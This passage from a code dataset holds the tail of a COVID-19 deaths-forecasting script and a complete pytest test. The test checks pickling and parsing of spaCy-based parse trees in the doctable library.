ci.to_csv(\"results/\"+ datasource +'_deaths_CI_'+date.today().strftime(\"%Y_%m_%d\")+'.csv')\n \n print(f'{datasource} deaths forecasting -- done')\n \n\n \n","repo_name":"ekkrym/CovidTrendModel","sub_path":"source/run_deaths_from_cases.py","file_name":"run_deaths_from_cases.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6022699538","text":"\nimport pytest\n\nimport spacy\n\nimport sys\nsys.path.append('..')\nimport doctable\n\nex_sents = '''\nThis is the best day ever, honestly. \nI am having a ton of fun with you. 
\nProgramming is awesome!\n'''.replace('\\n','')\n\ndef test_basic():\n nlp = spacy.load('en_core_web_sm', disable=['ner'])\n tmp = doctable.TempFolder('tmp')\n\n # verify operation by pickling/dicting and undicting\n trees = list()\n for sent in nlp(ex_sents).sents:\n \n tree = doctable.ParseTree.from_spacy(sent)\n trees.append(tree)\n print(sent)\n print(tree)\n \n assert(len(tree) == len(sent))\n\n fname = 'test_tree.pic'\n with tmp.path.joinpath(fname).open('wb') as f:\n f.write(tree.as_pickle())\n\n with tmp.path.joinpath(fname).open('rb') as f:\n othertree = doctable.ParseTree.from_pickle(f.read())\n\n assert(repr(tree) == repr(othertree))\n\n # now work with single tree\n tree = trees[0]\n assert(tree.root.text == 'is')\n assert(tree.root.tag == 'VBZ')\n\n # recall that ner was disabled\n with pytest.raises(doctable.textmodels.PropertyNotAvailable):\n tree.root.ent == ''\n \n\nif __name__ == '__main__':\n test_basic()\n \n ","repo_name":"devincornell/doctable","sub_path":"tests/test_parsetrees.py","file_name":"test_parsetrees.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}